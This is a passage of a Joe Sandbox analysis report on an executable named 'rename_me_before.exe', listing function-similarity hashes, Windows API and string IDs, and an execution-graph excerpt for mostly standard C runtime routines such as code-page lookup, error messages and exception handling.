                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2391AF32A0CA66E1E721BE29E45037D379BAB40B99F884136DB5D873D9DF3CE8458304
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                            • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                                                            • Instruction ID: 309420085532cd179c2b0c260f54809d0f7e54be323ac4e172d0e8a3e367e090
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9581A272E0C223FAF7747F25C21027926AAAF11B48F558035CA09D7796DF2DE941A722
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                            • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                            • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                                                            • Instruction ID: ea18bcb2ca4c266a869d2e7a81082bc039e02fc8e56005ab48a7f25f1fed8839
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D51A132B2D626EADB14FB15E444A787791FB44B89F108130EA5987788EF7CE842C780
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                            • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                                                            • Instruction ID: d26ef062bfe7f57b41249af47701fcc6fa16d6a2e638fa0a049ebbc3da8f672a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3617F3290CBD5D5EB21EB16E4407AAB7A0FB85794F044225EB9C47B99DF7CE190CB40
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                            • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                                                            • Instruction ID: 3435bf6396a4e8ad41bffa82bdd1c5e47a5f51866054ab524ff2bc78b19782cd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1951AF32A0C262E6EB64FF22904436877A1EB55B84F144136DA9C87BD5CF3CEA51CB81
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: Error$Error/warning (ANSI fallback)
• API String ID: 1878133881-653037927
• Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
• Instruction ID: c0eb819fd3564ee5e643f48b34dc94857462298f51cb2860743b6e197fce8d6d
• Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
• Instruction Fuzzy Hash: 80118B7262CA96A1FA24FB10F551BA92364FB84B88F901135DA9C87744CF3CD605C740
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: Error/warning (ANSI fallback)$Warning
• API String ID: 1878133881-2698358428
• Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
• Instruction ID: 6898f3b46c731db5639d573c148691f02ad36a90d9b99ba9fc6f534e9f9b8114
• Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
• Instruction Fuzzy Hash: 73118B7262CA96A1FA24FB10F551BA93364FB84B88F901135DA9C87744CF3CD604C740
APIs
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
• Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
• Instruction ID: 599a62b5aa2e578da32bb14563ad975de4f9c5d34eedb2e8da3037ad89be6239
• Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
• Instruction Fuzzy Hash: C4D11372B0CAA1D9E710EF79D4402AD37BAFB45B98B144236CE5E97B99DE38D406C340
APIs
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
• Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
• Instruction ID: 4e1a192d0076a52cf4575ebaa225ae3dffb7ad558b6d2708bffdfd4671950fe0
• Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
• Instruction Fuzzy Hash: 8F11A531E1C16292FA58FB6AE6842BD1292EF89B90F948031DB5987FDACD3DD5C18740
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
• Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
• Instruction ID: 7d97436e2cdf763460f67447f8a9ec2903ea4407e4eaf198c9c52247051e6810
• Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
• Instruction Fuzzy Hash: 3A413E62A0C3A265F728BB25D60137E5755EF827A8F104235EE6C86BD6DF3CD441CB00
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF6404F835E
  • Part of subcall function 00007FF6404F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
  • Part of subcall function 00007FF6404F9C58: GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6404EBEC5), ref: 00007FF6404F837C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\rename_me_before.exe
• API String ID: 3580290477-100362983
• Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
• Instruction ID: 0d5b3cdb9dd6dd4a0d6acaf5750bde0d4d7acd2cc4dcc607e8aefcf81ecb72f2
• Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
• Instruction Fuzzy Hash: 51418132A0CB62E5E718FF25A5810BC379AEF457A4B554039EE5D87B95DE3CE4818700
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: .$:
                                                                                                                                                                                                                                                            • API String ID: 2020911589-4202072812
                                                                                                                                                                                                                                                            • Opcode ID: 75108fa0d8fcfebdf0f3dc79d92ab90926721088542d1c76d0744241c3be7838
                                                                                                                                                                                                                                                            • Instruction ID: dcd28da8715499e852ed36772311ef6bc3a9062e7d6a0b07aae994aa9edb250e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75108fa0d8fcfebdf0f3dc79d92ab90926721088542d1c76d0744241c3be7838
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84417E62F0C762E9FB10FBB198506FC26BAAF54758F540035DE4DA7B89DF78A4429320
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                            • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                                                            • Instruction ID: 8b8d4b9416c589f260b880531aaf5e651441b8178d234a713b01115a6015ebe5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F041B122A1CAA5D6EB20EF65E8443AA6765FB88794F804131EE4DC7788DF3CD441CB40
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                            • Opcode ID: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                                                                                                                                                                                                            • Instruction ID: 265fd425774259fe4c10bacb84e146b6f2c0bc7eed03276dbc83b9e05cfd5995
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D621D572B0C691D1EB64BB16D04467E73A6FB84B84F854035DA8C83384CFBCDA45C751
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                            • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                                                            • Instruction ID: d5508817ca1574cb3cdebf1fea9f4d7507e4a5c8921daac632a5552b477f6921
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E11793660CB8182EB21AB14E440269B7E0FB88B88F188230DA8C47769DF3CC5518B00
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                            • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                                                            • Instruction ID: 512d6b907b4660450709611d994324b7190bfa6b4bc0ead6391dc0269b747c2a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9017822E1C666E6FB24BFA0A46127E22A5EF88708F840036D94DC6791DE6CE544DB24

Execution Graph

Execution Coverage: 7.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 2000
Total number of Limit Nodes: 23
19502->19490 19503 7ff640501764 19503->19501 19506 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19503->19506 19505 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19504->19505 19505->19490 19506->19501 19509 7ff640501867 19508->19509 19510 7ff640501871 19509->19510 19556 7ff6404ff5e8 EnterCriticalSection 19509->19556 19512 7ff6405018e3 19510->19512 19515 7ff6404f9814 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19510->19515 19512->19487 19516 7ff6405018fb 19515->19516 19518 7ff640501952 19516->19518 19520 7ff6404fa534 50 API calls 19516->19520 19518->19487 19521 7ff64050193c 19520->19521 19522 7ff6405015d4 65 API calls 19521->19522 19522->19518 19524 7ff6404f4178 45 API calls 19523->19524 19525 7ff6405012e8 19524->19525 19526 7ff6405012f4 GetOEMCP 19525->19526 19527 7ff640501306 19525->19527 19528 7ff64050131b 19526->19528 19527->19528 19529 7ff64050130b GetACP 19527->19529 19528->19490 19528->19491 19529->19528 19531 7ff6405012d4 47 API calls 19530->19531 19532 7ff6405019a9 19531->19532 19533 7ff640501aff 19532->19533 19534 7ff6405019e6 IsValidCodePage 19532->19534 19540 7ff640501a00 memcpy_s 19532->19540 19535 7ff6404eb870 _log10_special 8 API calls 19533->19535 19534->19533 19536 7ff6405019f7 19534->19536 19537 7ff640501741 19535->19537 19538 7ff640501a26 GetCPInfo 19536->19538 19536->19540 19537->19498 19537->19503 19538->19533 19538->19540 19557 7ff6405013ec 19540->19557 19613 7ff6404ff5e8 EnterCriticalSection 19541->19613 19558 7ff640501429 GetCPInfo 19557->19558 19567 7ff64050151f 19557->19567 19563 7ff64050143c 19558->19563 19558->19567 19559 7ff6404eb870 _log10_special 8 API calls 19560 7ff6405015be 19559->19560 19560->19533 19561 7ff640502150 48 API calls 19562 7ff6405014b3 19561->19562 19568 7ff640506e94 19562->19568 19563->19561 19566 7ff640506e94 54 API calls 19566->19567 19567->19559 19569 7ff6404f4178 45 API calls 19568->19569 19570 7ff640506eb9 19569->19570 19573 7ff640506b60 
